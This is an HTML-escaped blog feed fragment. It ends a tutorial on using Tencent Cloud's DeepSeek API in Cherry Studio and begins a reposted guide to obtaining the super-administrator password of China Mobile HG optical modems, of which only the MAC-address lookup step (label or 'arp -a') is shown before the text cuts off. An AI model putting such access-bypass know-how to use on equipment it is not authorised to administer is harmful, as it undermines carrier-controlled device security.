leaf=&quot;&quot;&gt;勾选“我已阅读并同意”，然后点击开通大模型知识引擎，中间的教程弹窗界面不用管，开通之后刷新这个界面即可。&lt;/span&gt;&lt;/p&gt;&lt;h2 style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-size: 18.2px; margin: 4em auto 2em; text-align: center; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; display: table; padding: 0.3em 1em; color: rgb(255, 255, 255); background: rgb(15, 76, 129); border-radius: 8px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;2. 创建 OpenAI 格式的 key&lt;/span&gt;&lt;/h2&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;点击“立即接入”，选择下面的使用 OpenAI SDK 方式介入，点击 “创建API KEY”。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;1742&quot; data-height=&quot;663&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739242849848150.png&quot; alt=&quot;1739242847651.png&quot;/&gt;&lt;/p&gt;&lt;p&gt;到这里我们已经有了调用腾讯云的 deepseek 模型的资格，如果你会写代码，可以使用代码去调用，下面我介绍使用现成的客户端来调用 deepseek 模型。&lt;/p&gt;&lt;h2 style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-size: 18.2px; margin: 4em auto 2em; text-align: center; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; display: table; padding: 0.3em 1em; color: rgb(255, 255, 255); background: rgb(15, 76, 129); border-radius: 8px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;3.下载本地客户端 (cherry studio)&lt;/span&gt;&lt;/h2&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;这里我使用的是 cherry studio 这个本地客户端，官网的地址是这个: https://cherry-ai.com/&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;会自动识别自己电脑能够使用的版本，直接下载即可。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;1412&quot; data-height=&quot;840&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739243975725901.png&quot; alt=&quot;1739243971510.png&quot;/&gt;&lt;/p&gt;&lt;h2 style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-size: 18.2px; margin: 4em auto 2em; text-align: center; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; display: table; padding: 0.3em 1em; color: rgb(255, 255, 255); background: rgb(15, 76, 129); border-radius: 8px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;4. 配置客户端&lt;/span&gt;&lt;/h2&gt;&lt;ol style=&quot;list-style-type: none;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;section&gt;&lt;span leaf=&quot;&quot;&gt;1. 打开客户端，点击设置，然后点击添加，如下图所示：&lt;/span&gt;&lt;/section&gt;&lt;/li&gt;&lt;li&gt;&lt;section&gt;&lt;span leaf=&quot;&quot;&gt;&lt;img data-width=&quot;1080&quot; data-height=&quot;697&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739244215620329.png&quot; alt=&quot;1739244210286.png&quot;/&gt;&lt;/span&gt;&lt;/section&gt;&lt;/li&gt;&lt;li&gt;&lt;section&gt;&lt;span leaf=&quot;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;创建一个供应商，名称随便图中我方便区分，把名字叫&amp;nbsp;&lt;/span&gt;&lt;code style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; font-feature-settings: normal; font-variation-settings: normal; font-size: 12.6px; line-height: 1.75; color: rgb(221, 17, 68); background: rgba(27, 31, 35, 0.05); padding: 3px 5px; border-radius: 4px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;腾讯云deepseek&lt;/span&gt;&lt;/code&gt;&lt;span leaf=&quot;&quot;&gt;&amp;nbsp;，提供商一定要选择&amp;nbsp;&lt;/span&gt;&lt;code style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; font-feature-settings: normal; font-variation-settings: normal; font-size: 12.6px; line-height: 1.75; color: rgb(221, 17, 68); background: rgba(27, 31, 35, 0.05); padding: 3px 5px; border-radius: 4px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;OpenAI&lt;/span&gt;&lt;/code&gt;&lt;span leaf=&quot;&quot;&gt;&amp;nbsp;， 然后点确定。&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;/li&gt;&lt;li&gt;&lt;section&gt;&lt;span leaf=&quot;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/section&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;&lt;img data-width=&quot;1080&quot; data-height=&quot;697&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739244014733901.png&quot; alt=&quot;1739244011752.png&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;span leaf=&quot;&quot;&gt;. 最后在设置当中，把刚刚在腾讯云上创建的 API KEY 填到 API 密钥当中，API 地址填&amp;nbsp;&lt;/span&gt;&lt;code style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; font-feature-settings: normal; font-variation-settings: normal; font-size: 12.6px; line-height: 1.75; color: rgb(221, 17, 68); background: rgba(27, 31, 35, 0.05); padding: 3px 5px; border-radius: 4px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;https://api.lkeap.cloud.tencent.com/v1/chat/completions&lt;/span&gt;&lt;/code&gt;&lt;span leaf=&quot;&quot;&gt;，再将&amp;nbsp;&lt;/span&gt;&lt;code style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; font-feature-settings: normal; font-variation-settings: normal; font-size: 12.6px; line-height: 1.75; color: rgb(221, 17, 68); background: rgba(27, 31, 35, 0.05); padding: 3px 5px; border-radius: 4px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;deepseek-r1&lt;/span&gt;&lt;/code&gt;&lt;span leaf=&quot;&quot;&gt;&amp;nbsp;和&amp;nbsp;&lt;/span&gt;&lt;code style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; font-feature-settings: normal; font-variation-settings: normal; font-size: 12.6px; line-height: 1.75; color: rgb(221, 17, 68); background: rgba(27, 31, 35, 0.05); padding: 3px 5px; border-radius: 4px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;deepseek-v3&lt;/span&gt;&lt;/code&gt;&lt;span leaf=&quot;&quot;&gt;&amp;nbsp;的模型添加到模型列表当中。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span leaf=&quot;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;h2 style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-size: 18.2px; margin: 4em auto 2em; text-align: center; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; display: table; padding: 0.3em 1em; color: rgb(255, 255, 255); background: rgb(15, 76, 129); border-radius: 8px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;测试效果&lt;/span&gt;&lt;/h2&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;然后我们回到对话页面，点击上方把模型切换成腾讯云的 deepseek 模型。&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;1080&quot; data-height=&quot;697&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739244122691704.png&quot; alt=&quot;1739244120066.png&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;span leaf=&quot;&quot;&gt;&lt;br/&gt;&lt;/span&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Tue, 11 Feb 2025 10:57:01 +0800</pubDate></item><item><title>2024年移动光猫获取超级密码</title><link>https://www.qxhut.cn/?id=44</link><description>&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 0px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;温馨提示：本方法&lt;/span&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #EE230D&quot;&gt;理论上&lt;/span&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;适用于中国移动HG系列光猫&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #EE230D&quot;&gt;光猫破解因地区、运营商、路由器和光猫型号而异，不能保证100%成功！&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;遇到任何问题都可以在评论区留言，记得附上&lt;/span&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;“地区+运营商+光猫型号”哦~&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;text-align: center&quot;&gt;&lt;img alt=&quot;cut-off&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164444_41259.png&quot; style=&quot;max-height: 2px&quot;/&gt;&lt;/p&gt;&lt;blockquote data-v-2505e99a=&quot;&quot; style=&quot;line-height: 1.6em; margin-top: 12px; margin-bottom: 0px; padding-left: 14px; position: relative; white-space-collapse: preserve; text-align: center;&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;&lt;/span&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; white-space: pre-wrap; background-color: #FFFFFF; font-size: 17px;&quot;&gt;&amp;nbsp;&amp;nbsp;原作者：&lt;/span&gt;&lt;a href=&quot;https://space.bilibili.com/521361612&quot; target=&quot;_blank&quot; class=&quot;opus-text-rich-hl link&quot; data-v-2505e99a=&quot;&quot; style=&quot;color: var(--text_link); cursor: pointer; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; white-space: pre-wrap; background-color: rgb(255, 255, 255); font-size: 17px;&quot;&gt;&lt;svg style=&quot;width:20px;height:20px;&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; viewbox=&quot;0 0 20 20&quot; width=&quot;20&quot; height=&quot;20&quot;&gt;&lt;path d=&quot;M9.571416666666666 7.6439C9.721125 7.33675 10.091416666666667 7.209108333333334 10.398583333333335 7.358808333333333C10.896041666666667 7.540316666666667 11.366333333333333 7.832000000000001 11.767333333333333 8.232975C13.475833333333334 9.941541666666668 13.475833333333334 12.711625 11.767333333333333 14.420166666666669L9.704916666666666 16.482583333333334C7.996383333333334 18.191125000000003 5.226283333333334 18.191125000000003 3.5177416666666668 16.482583333333334C1.8091916666666668 14.774041666666669 1.8091916666666668 12.003916666666667 3.5177416666666668 10.295375L5.008791666666667 8.804333333333334C5.252875 8.56025 5.6486 8.56025 5.892683333333334 8.804333333333334C6.136758333333334 9.048416666666668 6.136758333333334 9.444125000000001 5.892683333333334 9.688208333333334L4.401625 11.179250000000001C3.1812333333333336 12.399666666666667 3.1812333333333336 14.378291666666668 4.401625 15.598708333333335C5.622000000000001 16.819083333333335 7.60065 16.819083333333335 8.821041666666668 15.598708333333335L10.883416666666667 13.536291666666667C12.103833333333334 12.315916666666666 12.103833333333334 10.337250000000001 10.883416666666667 9.116875C10.582458333333333 8.815875 10.229416666666667 8.600908333333333 9.856458333333334 8.471066666666667C9.549333333333333 8.321375 9.421708333333335 7.9510499999999995 9.571416666666666 7.6439z&quot; fill=&quot;currentColor&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M15.597541666666668 4.402641666666667C14.377166666666668 3.1822500000000002 12.398541666666667 3.1822500000000002 11.178125000000001 4.402641666666667L9.11575 6.465033333333333C7.895358333333333 7.685425 7.895358333333333 9.664041666666668 9.11575 10.884458333333333C9.397666666666668 11.166375 9.725916666666667 11.371583333333334 10.073083333333333 11.500958333333333C10.376583333333334 11.658083333333334 10.495291666666667 12.031416666666667 10.338208333333332 12.334875C10.181083333333333 12.638375 9.80775 12.757083333333334 9.504291666666667 12.6C9.042416666666666 12.420333333333334 8.606383333333333 12.142833333333334 8.231858333333333 11.768333333333334C6.523316666666667 10.059791666666667 6.523316666666667 7.289691666666666 8.231858333333333 5.58115L10.29425 3.5187583333333334C12.002791666666667 1.8102083333333334 14.772875 1.8102083333333334 16.481458333333336 3.5187583333333334C18.19 5.2273000000000005 18.19 7.997400000000001 16.481458333333336 9.705916666666667L15.054916666666667 11.132458333333334C14.810875000000001 11.3765 14.415166666666668 11.3765 14.171041666666667 11.132458333333334C13.927 10.888333333333334 13.927 10.492625 14.171041666666667 10.248541666666666L15.597541666666668 8.822041666666667C16.81791666666667 7.601666666666667 16.81791666666667 5.623025 15.597541666666668 4.402641666666667z&quot; fill=&quot;currentColor&quot;&gt;&lt;/path&gt;&lt;/svg&gt;网页链接&lt;/a&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;color: #18191C; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, Helvetica, Arial, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, sans-serif; white-space: pre-wrap; background-color: #FFFFFF; font-size: 17px;&quot;&gt;https://www.bilibili.com/read/cv21044770&amp;nbsp;出处：bilibili&lt;/span&gt;&lt;/blockquote&gt;&lt;blockquote data-v-2505e99a=&quot;&quot; style=&quot;line-height: 1.6em; margin-top: 12px; margin-bottom: 0px; padding-left: 14px; position: relative; white-space-collapse: preserve; text-align: center;&quot;&gt;&lt;img alt=&quot;cut-off&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164444_41259.png&quot; style=&quot;max-height: 2px&quot;/&gt;&lt;/blockquote&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: rgb(238, 35, 13)&quot;&gt;免责声明&lt;/strong&gt; &lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: rgb(238, 35, 13)&quot;&gt;本文仅供学习交流使用&lt;/strong&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 20px;color: rgb(238, 35, 13)&quot;&gt;由于本文所导致的光猫任何损坏，以及造成的利益损失&lt;/strong&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 20px;color: rgb(238, 35, 13)&quot;&gt;作者概不承担任何责任&lt;/strong&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 20px;color: rgb(238, 35, 13)&quot;&gt;继续阅读本文即代表理解且同意免责声明&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;text-align: center&quot;&gt;&lt;img alt=&quot;cut-off&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164444_41259.png&quot; style=&quot;max-height: 2px&quot;/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 24px&quot;&gt;第一步 获取MAC&lt;/strong&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 20px&quot;&gt;第一种方法，直接在光猫上找到（简单粗暴）&lt;/strong&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;看光猫的反面，你会看到这样一堆东西&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;picture style=&quot;width: 438px;height: 243px;display: inline-block;vertical-align: middle;border-radius: inherit&quot;&gt;&lt;source type=&quot;image/avif&quot; srcset=&quot;//i0.hdslb.com/bfs/article/344c282c3a595cc8e6637b1380a56c8195663211.jpg@876w_486h.avif&quot;/&gt;&lt;source type=&quot;image/webp&quot; srcset=&quot;//i0.hdslb.com/bfs/article/344c282c3a595cc8e6637b1380a56c8195663211.jpg@876w_486h.webp&quot;/&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502191739935822179292.jpg&quot; alt=&quot;1739935819062.jpg&quot;/&gt;&lt;/picture&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #999999&quot;&gt;没错，就是这样一堆东西&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;看到这串MAC号，把它记下来，比如说54-E0-05-2A-4F-20&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;并且把所有横杠删掉，就变成了54E0052A4F20&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;text-align: center&quot;&gt;&lt;img alt=&quot;cut-off&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/01/20250102164444_41259.png&quot; style=&quot;max-height: 2px&quot;/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 24px&quot;&gt;或者如果你找不到，那么请用第二种方法&lt;/strong&gt;&lt;strong data-v-2505e99a=&quot;&quot; style=&quot;font-size: 24px&quot;&gt; &lt;/strong&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;1、打开cmd（Windows）或者 Terminal终端（macOS）&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;2、执行&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;figure style=&quot;margin: 20px 0px 0px;padding: 0px&quot;&gt;&lt;pre class=&quot; language-javascript&quot; style=&quot;overflow-wrap: normal;background-color: rgb(245, 242, 240);font-family: Consolas, Monaco, &amp;#39;Andale Mono&amp;#39;, &amp;#39;Ubuntu Mono&amp;#39;, monospace;font-size: 14px;hyphens: none;line-height: 1.5;text-shadow: rgb(255, 255, 255) 0px 1px;word-spacing: normal;margin-top: 0px;margin-bottom: 0px;overflow: auto;padding: 1em&quot;&gt;arp&amp;nbsp;-a&lt;/pre&gt;&lt;/figure&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;3、对话框会显示一堆东西，你只需要找到192.168.1.1所对应的那一串&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;比如说&amp;nbsp;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: center;&quot;&gt;&lt;picture style=&quot;width: 530px;height: 62px;display: inline-block;vertical-align: middle;border-radius: inherit&quot;&gt;&lt;source type=&quot;image/avif&quot; srcset=&quot;//i0.hdslb.com/bfs/article/7d1ccb836e520ae1314895a692dd1c96fe3fa16f.png@1060w_124h.avif&quot;/&gt;&lt;source type=&quot;image/webp&quot; srcset=&quot;//i0.hdslb.com/bfs/article/7d1ccb836e520ae1314895a692dd1c96fe3fa16f.png@1060w_124h.webp&quot;/&gt;&lt;img src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502191739935833618813.jpg&quot; alt=&quot;1739935831375.jpg&quot;/&gt;&lt;/picture&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve;text-align: center&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px;color: #999999&quot;&gt;一堆东西&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; data-v-5b474d2a=&quot;&quot; style=&quot;margin-top: 20px;margin-bottom: 0px;padding: 0px;line-height: 1.69em;white-space-collapse: preserve&quot;&gt;&lt;span data-v-2505e99a=&quot;&quot; style=&quot;font-size: 17px&quot;&gt;这里面，你只需要看到第一行192.168.1.1，并且把54:e0:5:2a:4f:20记下来&lt;/span&gt;&lt;/p&gt;&lt;p data-v-2505e99a=&quot;&quot; 